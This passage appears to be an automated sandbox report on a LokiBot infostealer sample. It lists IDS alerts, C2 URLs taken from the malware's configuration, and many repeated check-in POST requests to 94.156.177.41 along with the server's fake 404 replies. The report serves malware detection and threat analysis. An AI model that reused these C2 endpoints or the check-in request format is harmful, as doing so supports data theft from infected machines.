Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49950
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49871 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49866 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49866 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49866 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49871
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49866 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49866 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49866

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 94.156.177.41/kings/five/fre.php

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00404ED4 recv,

8_2_00404ED4

Source: unknown

HTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
